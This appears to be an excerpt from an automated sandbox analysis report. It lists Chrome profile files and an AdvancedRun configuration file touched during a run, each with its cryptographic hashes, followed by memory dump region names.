C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c62c553083980b1f3ffc1594b6ed62d3 |
| SHA1 | 55582b0155862d25db328d44a5d49e3acf781302 |
| SHA256 | f7dfbed31834054f439828379586e33b754ef844b34f27d9b85da7350277dea8 |
| SHA512 | 548a5f36b4974fdca022f520ddd6a0cd460c28b361a0718d3bece6f6db758905fff7bf65728e411d40ec92c2fcb06335be14f227678ce0348650efa7979e707f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 131054ae42ec95352c793189c11a7c25 |
| SHA1 | 2b47906ee9c7ab6b30e8be73ab6a3f86de340826 |
| SHA256 | 70686afa7d17cde77b987ca8c362fc24bd8729a6fa4cbf3c6441c64e564250ba |
| SHA512 | 6e6392b265d0acd49bdf7d45ddf3e0e8d00f68186c605179d5a82894b1fc1b206a88ef9ddc42640d523726e75dbacd71e78a706173e28ca5fc1555144e20c2ac |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c9e13106c0df67f2dfd7422377a74a9f |
| SHA1 | b97738c0030b1f73178f772bd471b3c257970b30 |
| SHA256 | 9d4df24ef0019f683b114738196b0a19be76396a7950a7f962eda74a2c8cdc56 |
| SHA512 | 66674fef7d577bc67d72e41d25485775cb0937dcfbe2644adf4b7de05a180d9de4116c5bf5b954ad2b8290e0b7050cc8999b65bb5f1b6c35b177d0f4318f7633 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | f41eb055bb4ff5d650717cfb6d0b9a0b |
| SHA1 | 0aeeca1cbde1fdebad8eaaf19cb6a76b71641927 |
| SHA256 | 503c38cca2570e0e9d91985f9255d51de23a9060526f17f3ba3e5ddc0e817b77 |
| SHA512 | 0740d2fa3b5e29780ad22c98e534209385f66451d248e10f6f2e6c13328e40b767983f03c1d2b3fc768939887be77eae61bea4402818570afb874f31f96b8598 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f59d7ac1ecdad9e9b1ca12aa3deeac0d |
| SHA1 | a75b30945e3a2d92c9fa1ed4cb66e613c2cd303a |
| SHA256 | 97c15ea73fe93c81846c1f43433e336b6f1cfd9a88168350b03f5b1b97ef5ecf |
| SHA512 | 45b845a3e981de0e2dfcdb81cf1c56ec1287b96092500cb2363e5e2c6b337a22025a421fcddcbbb384ae35ee908e21fdb702bf6da0aa7ea077a5b1b03dc173b6 |
C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.cfg
| MD5 | 904eaad00901f98cdf00b7c910139a7f |
| SHA1 | 9a49fa7da54f9372f5ecb287ae325d1f51b9c376 |
| SHA256 | 1c1b57f22a38567a6f9b75086f703544d73bb6cafed06bdbcd9e4250cdb84e50 |
| SHA512 | 63d701a4d7b7dcdc565ad42278f43339833b4ab71cbc93b53a90a6bd85fdb6e94b5caeba1549f076bd18f4041345e6c3e7847583ff27b8859555ae9d64b996e9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | efdf336c3d3a1adb92b2ad84b9e0ddf8 |
| SHA1 | d12684bf46d8efdc7fe65d72974a64f8cfc83aae |
| SHA256 | a3b64fe67ea4be6fd1cad4f43ab347f08f3c05afd11552101ddc5f80fd3e31cc |
| SHA512 | d47956132f95e0f8c31b0d8e8b23a7748b4fd39b6acf746e65600499bb6dac8bf3ba64843a090e41066de86eadd02aeb9c1ebd3ab9cdee4bd9d7867febbb696e |
memory/244-3008-0x00007FF978F10000-0x00007FF978F20000-memory.dmp
memory/244-3010-0x00007FF978F10000-0x00007FF978F20000-memory.dmp
memory/244-3009-0x00007FF978F10000-0x00007FF978F20000-memory.dmp
memory/244-3011-0x00007FF978F10000-0x00007FF978F20000-memory.dmp
memory/244-3012-0x00007FF978F10000-0x00007FF978F20000-memory.dmp
memory/244-3013-0x00007FF9765B0000-0x00007FF9765C0000-memory.dmp
memory/244-3014-0x00007FF9765B0000-0x00007FF9765C0000-memory.dmp